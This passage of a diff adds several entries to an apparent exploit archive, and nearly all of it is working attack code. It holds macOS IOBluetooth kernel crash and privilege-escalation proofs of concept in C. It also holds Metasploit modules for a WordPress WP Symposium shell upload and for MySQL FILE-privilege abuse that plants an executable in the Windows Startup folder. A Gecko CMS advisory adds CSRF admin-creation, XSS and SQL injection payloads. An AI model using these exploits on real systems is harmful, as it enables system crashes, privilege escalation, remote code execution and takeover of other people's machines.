def execute(jsp_name, time_out = 20)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, jsp_name),
'method' => 'GET'
}, time_out)
res
end
def jsp_path
jsp =<<-EOS
<%@ page language="Java" import="java.util.*"%>
<%
out.println("Path:" + System.getProperty("catalina.home"));
%>
EOS
jsp
end
end

74
platforms/osx/dos/35771.c Executable file
View file

@ -0,0 +1,74 @@
/*
* crash-issue1.c: Written for Mac OS X Yosemite (10.10) by @rpaleari and @joystick.
*
* Exploits a missing check in
* IOBluetoothHCIUserClient::DispatchHCICreateConnection() causing a panic.
*
* gcc -Wall -o crash-issue1{,.c} -framework IOKit
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <mach/mach.h>
#include <mach/vm_map.h>
#include <IOKit/IOKitLib.h>
#define SIZE 0x1000
struct BluetoothCall {
uint64_t args[7];
uint64_t sizes[7];
uint64_t index;
};
int main(void) {
/* Finding vuln service */
io_service_t service =
IOServiceGetMatchingService(kIOMasterPortDefault,
IOServiceMatching("IOBluetoothHCIController"));
if (!service) {
return -1;
}
/* Connect to vuln service */
io_connect_t port = (io_connect_t) 0;
kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
IOObjectRelease(service);
if (kr != kIOReturnSuccess) {
return kr;
}
printf(" [+] Opened connection to service on port: %d\n", port);
struct BluetoothCall a;
int i;
for (i=0; i<7; i++) {
a.args[i] = (uint64_t) calloc(SIZE, sizeof(char));
a.sizes[i] = SIZE;
}
/* This value causes IOMalloc() to fail */
a.args[6] = 0x0;
a.sizes[6] = 0x80000041;
a.index = 0x06; /* DispatchHCICreateConnection() */
for(i = 0; i < 120; i++) {
if(i % 8 == 0) printf("\n");
printf("\\x%02x", ((unsigned char *)&a)[i]);
}
printf("\n");
kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
(uint32_t) 0, /* Selector */
NULL, 0, /* input, inputCnt */
(const void*) &a, /* inputStruct */
120, /* inputStructCnt */
NULL, NULL, NULL, NULL); /* Output stuff */
printf("kr: %08x\n", kr);
return IOServiceClose(port);
}

74
platforms/osx/dos/35772.c Executable file
View file

@ -0,0 +1,74 @@
/*
* crash-issue2.c: Written for Mac OS X Yosemite (10.10) by @rpaleari and @joystick.
*
* Triggers a panic overwriting a stack_canary.
*
* gcc -Wall -o crash-issue2{,.c} -framework IOKit
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <mach/mach.h>
#include <mach/vm_map.h>
#include <IOKit/IOKitLib.h>
struct BluetoothCall {
uint64_t args[7];
uint64_t sizes[7];
uint64_t index;
};
int main(void) {
/* Finding vuln service */
io_service_t service =
IOServiceGetMatchingService(kIOMasterPortDefault,
IOServiceMatching("IOBluetoothHCIController"));
if (!service) {
return -1;
}
/* Connect to vuln service */
io_connect_t port = (io_connect_t) 0;
kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
IOObjectRelease(service);
if (kr != kIOReturnSuccess) {
return kr;
}
printf(" [+] Opened connection to service on port: %d\n", port);
struct BluetoothCall a;
a.sizes[0] = 0x1000;
a.args[0] = (uint64_t) calloc(a.sizes[0], sizeof(char));
/* This arguments overflows a local buffer and the adjacent stack canary */
a.sizes[1] = 264;
a.args[1] = (uint64_t) calloc(a.sizes[1], sizeof(char));
memset((void *)a.args[1], 'A', a.sizes[1]);
/* Call IOBluetoothHCIUserClient::DispatchHCIReadLocalName() */
a.index = 0x2d;
/* Debug */
for(int i = 0; i < 120; i++) {
if(i % 8 == 0) printf("\n");
printf("\\x%02x", ((unsigned char *)&a)[i]);
}
printf("\n");
fflush(stdout);
kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
(uint32_t) 0, /* Selector */
NULL, 0, /* input, inputCnt */
(const void*) &a, /* inputStruct */
sizeof(a), /* inputStructCnt */
NULL, NULL, NULL, NULL); /* Output stuff */
printf("kr: %08x\n", kr);
return IOServiceClose(port);
}

77
platforms/osx/dos/35773.c Executable file
View file

@ -0,0 +1,77 @@
/*
* crash-issue3.c: Written for Mac OS X Yosemite (10.10) by @rpaleari and @joystick.
*
* Exploits a missing check in
* IOBluetoothHCIController::TransferACLPacketToHW() to trigger a panic.
*
* gcc -Wall -o crash-issue3{,.c} -framework IOKit
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <mach/mach.h>
#include <mach/vm_map.h>
#include <IOKit/IOKitLib.h>
struct BluetoothCall {
uint64_t args[7];
uint64_t sizes[7];
uint64_t index;
};
int main(void) {
/* Finding vuln service */
io_service_t service =
IOServiceGetMatchingService(kIOMasterPortDefault,
IOServiceMatching("IOBluetoothHCIController"));
if (!service) {
return -1;
}
/* Connect to vuln service */
io_connect_t port = (io_connect_t) 0;
kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
IOObjectRelease(service);
if (kr != kIOReturnSuccess) {
return kr;
}
printf(" [+] Opened connection to service on port: %d\n", port);
struct BluetoothCall a;
memset(&a, 0, sizeof(a));
a.sizes[0] = 0x1000;
a.args[0] = (uint64_t) calloc(a.sizes[0], sizeof(char));
a.sizes[1] = 0x1000;
a.args[1] = (uint64_t) calloc(a.sizes[1], sizeof(char));
memset((void *)a.args[1], 0x22, 0x1000);
/* Call DispatchHCISendRawACLData() */
a.index = 0x63;
/* Debug */
for(int i = 0; i < 120; i++) {
if(i % 8 == 0) printf("\n");
printf("\\x%02x", ((unsigned char *)&a)[i]);
}
printf("\n");
fflush(stdout);
kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
(uint32_t) 0, /* Selector */
NULL, 0, /* input, inputCnt */
(const void*) &a, /* inputStruct */
sizeof(a), /* inputStructCnt */
NULL, NULL, NULL, NULL); /* Output stuff */
printf("kr: %08x\n", kr);
return IOServiceClose(port);
}

141
platforms/osx/dos/35774.c Executable file
View file

@ -0,0 +1,141 @@
/*
* lpe-issue1.c
* Written for Mac OS X Yosemite (10.10.1) by @joystick and @rpaleari.
*
* Exploits IOBluetoothHCIUserClient::DispatchHCIWriteStoredLinkKey()
*
* gcc -Wall -o lpe-issue1{,.c} -framework IOKit
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <mach/mach.h>
#include <mach/vm_map.h>
#include <IOKit/IOKitLib.h>
#define SIZE 0x1000
struct BluetoothCall {
uint64_t args[7];
uint64_t sizes[7];
uint64_t index;
};
#ifndef bswap64
# define bswap64(num) \
( (((uint64_t)(num) << 56) ) \
| (((uint64_t)(num) << 40) & UINT64_C(0x00FF000000000000)) \
| (((uint64_t)(num) << 24) & UINT64_C(0x0000FF0000000000)) \
| (((uint64_t)(num) << 8) & UINT64_C(0x000000FF00000000)) \
| (((uint64_t)(num) >> 8) & UINT64_C(0x00000000FF000000)) \
| (((uint64_t)(num) >> 24) & UINT64_C(0x0000000000FF0000)) \
| (((uint64_t)(num) >> 40) & UINT64_C(0x000000000000FF00)) \
| (((uint64_t)(num) >> 56) ) )
#endif
void create_requests(io_connect_t port)
{
struct BluetoothCall a;
uint32_t i;
kern_return_t kr;
for (i = 0; i < 7; i++) {
a.args[i] = (uint64_t) calloc(SIZE, sizeof(char));
a.sizes[i] = SIZE;
}
/* DispatchHCIRequestCreate() */
a.index = 0x0;
*(uint64_t *)a.args[0] = 5*1000; /* Timeout */
memset((void *)a.args[1], 0x81, 0x1000);
memset((void *)a.args[2], 0x82, 0x1000);
memset((void *)a.args[3], 0x83, 0x1000);
memset((void *)a.args[4], 0x84, 0x1000);
memset((void *)a.args[5], 0x85, 0x1000);
memset((void *)a.args[6], 0x86, 0x1000);
for(i = 0; i < 500; i++) {
kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
(uint32_t) 0, /* Selector */
NULL, 0, /* input, inputCnt */
(const void*) &a, /* inputStruct */
120, /* inputStructCnt */
NULL, NULL, NULL, NULL); /* Output stuff */
if(kr == 0xe00002bd) /* Full */
break;
}
}
int main(void) {
struct BluetoothCall a;
int i;
void *landing_page = calloc(SIZE, sizeof(char));
/* Init a */
for (i = 0; i < 7; i++) {
a.args[i] = (uint64_t) calloc(SIZE, sizeof(char));
a.sizes[i] = SIZE;
}
/* Finding vuln service */
io_service_t service =
IOServiceGetMatchingService(kIOMasterPortDefault,
IOServiceMatching("IOBluetoothHCIController"));
if (!service) {
return -1;
}
/* Connect to vuln service */
io_connect_t port = (io_connect_t) 0;
kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
IOObjectRelease(service);
if (kr != kIOReturnSuccess) {
return kr;
}
/* Populating with fake requests. */
create_requests(port);
/* IOBluetoothHCIUserClient::DispatchHCIWriteStoredLinkKey() */
a.index = 42;
/* Req number */
*((uint32_t *)a.args[0]) = 1;
/* num_of_keys */
*((uint32_t *)a.args[1]) = 0x20;
/* Padding */
memset((void *)a.args[3], 0x33, 152);
/* mov rdi, [r14+0AB8h] */
*((uint64_t *)(a.args[3]+152)) = bswap64((uint64_t)landing_page);
/* mov rax, [rdi] */
*((uint64_t *)((uint64_t)landing_page)) = (uint64_t)landing_page;
/* call [rax+0x1d0]: this will trigger a #GP calling 0x4141414142424242 */
*((uint64_t *)((uint64_t)landing_page+0x1d0)) = (uint64_t) 0x4141414142424242;
/* Here some fixing to the vtable is required to return cleanly after the exploit */
#if 0
/* Debug print */
for(i = 0; i < 120; i++) {
if(i % 8 == 0) printf("\n");
printf("\\x%02x", ((unsigned char *)&a)[i]);
}
printf("\n");
#endif
kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
(uint32_t) 0, /* Selector */
NULL, 0, /* input, inputCnt */
(const void*) &a, /* inputStruct */
120, /* inputStructCnt */
NULL, NULL, NULL, NULL); /* Output stuff */
printf("kr: %08x\n", kr);
return IOServiceClose(port);
}

99
platforms/php/remote/35778.rb Executable file
View file

@ -0,0 +1,99 @@
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FileDropper
include Msf::HTTP::Wordpress
def initialize(info = {})
super(update_info(
info,
'Name' => 'WordPress WP Symposium 14.11 Shell Upload',
'Description' => %q{WP Symposium Plugin for WordPress contains a
flaw that allows a remote attacker to execute
arbitrary PHP code. This flaw exists because the
/wp-symposium/server/file_upload_form.php script
does not properly verify or sanitize
user-uploaded files. By uploading a .php file,
the remote system will place the file in a
user-accessible path. Making a direct request to
the uploaded file will allow the attacker to
execute the script with the privileges of the
web server.},
'License' => MSF_LICENSE,
'Author' =>
[
'Claudio Viviani', # Vulnerability disclosure
'Rob Carr <rob[at]rastating.com>' # Metasploit module
],
'References' =>
[
['OSVDB', '116046'],
['WPVDB', '7716']
],
'DisclosureDate' => 'Dec 11 2014',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['wp-symposium < 14.12', {}]],
'DefaultTarget' => 0
))
end
def check
check_plugin_version_from_readme('wp-symposium', '14.12')
end
def generate_mime_message(payload, payload_name, directory_name, symposium_url)
data = Rex::MIME::Message.new
data.add_part('1', nil, nil, 'form-data; name="uploader_uid"')
data.add_part("./#{directory_name}/", nil, nil, 'form-data; name="uploader_dir"')
data.add_part(symposium_url, nil, nil, 'form-data; name="uploader_url"')
data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"files[]\"; filename=\"#{payload_name}\"")
data
end
def exploit
print_status("#{peer} - Preparing payload")
unique_name = Rex::Text.rand_text_alpha(10)
payload_name = "#{unique_name}.php"
symposium_url = normalize_uri(wordpress_url_plugins, 'wp-symposium', 'server', 'php')
payload_url = normalize_uri(symposium_url, unique_name, payload_name)
data = generate_mime_message(payload, payload_name, unique_name, symposium_url)
symposium_url = normalize_uri(symposium_url, 'index.php')
print_status("#{peer} - Uploading payload to #{payload_url}")
res = send_request_cgi(
'method' => 'POST',
'uri' => symposium_url,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
)
if res && res.code == 200 && res.body.length > 0 && !res.body.include?('error') && res.body != '0'
print_good("#{peer} - Uploaded the payload")
register_files_for_cleanup(payload_name)
print_status("#{peer} - Executing the payload...")
send_request_cgi(
{
'uri' => payload_url,
'method' => 'GET'
}, 5)
print_good("#{peer} - Executed payload")
else
if res.nil?
fail_with(Failure::Unreachable, "No response from the target")
else
vprint_error("#{peer} - HTTP Status: #{res.code}")
vprint_error("#{peer} - Server returned: #{res.body}")
fail_with(Failure::UnexpectedReply, "Failed to upload the payload")
end
end
end
end

117
platforms/php/webapps/35767.txt Executable file
View file

@ -0,0 +1,117 @@
?Gecko CMS 2.3 Multiple Vulnerabilities
Vendor: JAKWEB
Product web page: http://www.cmsgecko.com
Affected version: 2.3 and 2.2
Summary: Gecko CMS is the way to go, forget complicated, bloated
and slow content management systems, Gecko CMS has been build to
be intuitive, easy to use, extendable to almost anything, running
on all standard web hosting (PHP and one MySQL database, Apache is
a plus), browser compatibility and fast, super fast!
Desc: Gecko CMS suffers from multiple vulnerabilities including
Cross-Site Request Forgery, Stored and Reflected Cross-Site Scripting
and SQL Injection.
Tested on: Apache/2
PHP/5.4.36
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5222
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5222.php
27.12.2014
---
CSRF Add Admin:
===============
<html>
<body>
<form action="http://server/admin/index.php?p=user&sp=newuser" method="POST">
<input type="hidden" name="jak_name" value="Testingus2" />
<input type="hidden" name="jak_email" value="test2@test.test" />
<input type="hidden" name="jak_username" value="Testusername2" />
<input type="hidden" name="jak_usergroup" value="3" />
<input type="hidden" name="jak_access" value="1" />
<input type="hidden" name="jak_password" value="123123" />
<input type="hidden" name="jak_confirm_password" value="123123" />
<input type="hidden" name="save" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
usergroup 4 = moderator
3 = administrator
2 = member standard
1 = guest
5 = banned
Stored XSS (params: jak_img, jak_name, jak_url):
================================================
POST http://server/admin/index.php?p=categories&sp=newcat HTTP/1.1
jak_catparent 0
jak_catparent2 0
jak_footer 1
jak_img "><script>alert(1);</script>
jak_lcontent <p>test</p>
jak_lcontent2
jak_menu 1
jak_name "><script>alert(2);</script>
jak_name2
jak_url "><script>alert(3);</script>
jak_varname ZSL
save
SQL Injection (params: jak_delete_log[], ssp):
==============================================
POST /admin/index.php?p=logs&sp=s HTTP/1.1
delete=&jak_delete_log%5B%5D=4%20and%20benchmark(20000000%2csha1(1))--%20&jak_delete_log%5B%5D=2&jak_delete_log%5B%5D=1
--
GET /admin/index.php?p=logs&sp=delete&ssp=3[SQLi] HTTP/1.1
Reflected XSS:
==============
/admin/index.php [horder%5B%5D parameter]
/admin/index.php [jak_catid parameter]
/admin/index.php [jak_content parameter]
/admin/index.php [jak_css parameter]
/admin/index.php [jak_delete_log%5B%5D parameter]
/admin/index.php [jak_email parameter]
/admin/index.php [jak_extfile parameter]
/admin/index.php [jak_file parameter]
/admin/index.php [jak_hookshow%5B%5D parameter]
/admin/index.php [jak_img parameter]
/admin/index.php [jak_javascript parameter]
/admin/index.php [jak_lcontent parameter]
/admin/index.php [jak_name parameter]
/admin/index.php [jak_password parameter]
/admin/index.php [jak_showcontact parameter]
/admin/index.php [jak_tags parameter]
/admin/index.php [jak_title parameter]
/admin/index.php [jak_url parameter]
/admin/index.php [jak_username parameter]
/admin/index.php [real_hook_id%5B%5D parameter]
/admin/index.php [sp parameter]
/admin/index.php [sreal_plugin_id%5B%5D parameter]
/admin/index.php [ssp parameter]
/admin/index.php [sssp parameter]
/js/editor/plugins/filemanager/dialog.php [editor parameter]
/js/editor/plugins/filemanager/dialog.php [field_id parameter]
/js/editor/plugins/filemanager/dialog.php [fldr parameter]
/js/editor/plugins/filemanager/dialog.php [lang parameter]
/js/editor/plugins/filemanager/dialog.php [popup parameter]
/js/editor/plugins/filemanager/dialog.php [subfolder parameter]
/js/editor/plugins/filemanager/dialog.php [type parameter]

143
platforms/windows/remote/35777.rb Executable file
View file

@ -0,0 +1,143 @@
##
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::MYSQL
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle MySQL for Microsoft Windows FILE Privilege Abuse',
'Description' => %q{
This module takes advantage of a file privilege misconfiguration problem
specifically against Windows MySQL servers. This module abuses the FILE
privilege to write a payload to Microsoft's All Users Start Up directory
which will execute every time a user logs in. The default All Users Start
Up directory used by the module is Windows 7 friendly.
},
'Author' =>
[
'sinn3r',
'Sean Verity <veritysr1980[at]gmail.com'
],
'DefaultOptions' =>
{
'DisablePayloadHandler' => 'true'
},
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2012-5613'], #DISPUTED
['OSVDB', '88118'],
['EDB', '23083'],
['URL', 'http://seclists.org/fulldisclosure/2012/Dec/13']
],
'Platform' => 'win',
'Targets' =>
[
[ 'MySQL on Windows', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 01 2012'
))
register_options(
[
OptString.new('USERNAME', [ true, 'The username to authenticate as']),
OptString.new('PASSWORD', [ true, 'The password to authenticate with']),
OptString.new('STARTUP_FOLDER', [ true, 'The All Users Start Up folder', '/programdata/microsoft/windows/start menu/programs/startup/'])
])
end
def check
m = mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
return Exploit::CheckCode::Safe unless m
return Exploit::CheckCode::Appears if is_windows?
Exploit::CheckCode::Safe
end
def peer
"#{rhost}:#{rport}"
end
def query(q)
rows = []
begin
res = mysql_query(q)
return rows unless res
res.each_hash do |row|
rows << row
end
rescue RbMysql::ParseError
return rows
end
rows
end
def is_windows?
r = query("SELECT @@version_compile_os;")
r[0]['@@version_compile_os'] =~ /^Win/ ? true : false
end
def get_drive_letter
r = query("SELECT @@tmpdir;")
drive = r[0]['@@tmpdir'].scan(/^(\w):/).flatten[0] || ''
drive
end
def upload_file(bin, dest)
p = bin.unpack("H*")[0]
query("SELECT 0x#{p} into DUMPFILE '#{dest}'")
end
def exploit
unless datastore['STARTUP_FOLDER'].start_with?('/') && datastore['STARTUP_FOLDER'].end_with?('/')
fail_with(Failure::BadConfig, "STARTUP_FOLDER should start and end with '/' Ex: /programdata/microsoft/windows/start menu/programs/startup/")
end
print_status("#{peer} - Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
begin
m = mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
rescue RbMysql::AccessDeniedError
fail_with(Failure::NoAccess, "#{peer} - Access denied")
end
fail_with(Failure::NoAccess, "#{peer} - Unable to Login") unless m
unless is_windows?
fail_with(Failure::NoTarget, "#{peer} - Remote host isn't Windows")
end
begin
drive = get_drive_letter
rescue RbMysql::ParseError
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name")
end
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name") unless drive
exe_name = Rex::Text::rand_text_alpha(5) + ".exe"
dest = "#{drive}:#{datastore['STARTUP_FOLDER']}#{exe_name}"
exe = generate_payload_exe
print_status("#{peer} - Uploading to '#{dest}'")
begin
upload_file(exe, dest)
rescue RbMysql::AccessDeniedError
fail_with(Failure::NotVulnerable, "#{peer} - No permission to write. I blame kc :-)")
end
register_file_for_cleanup("#{dest}")
end
end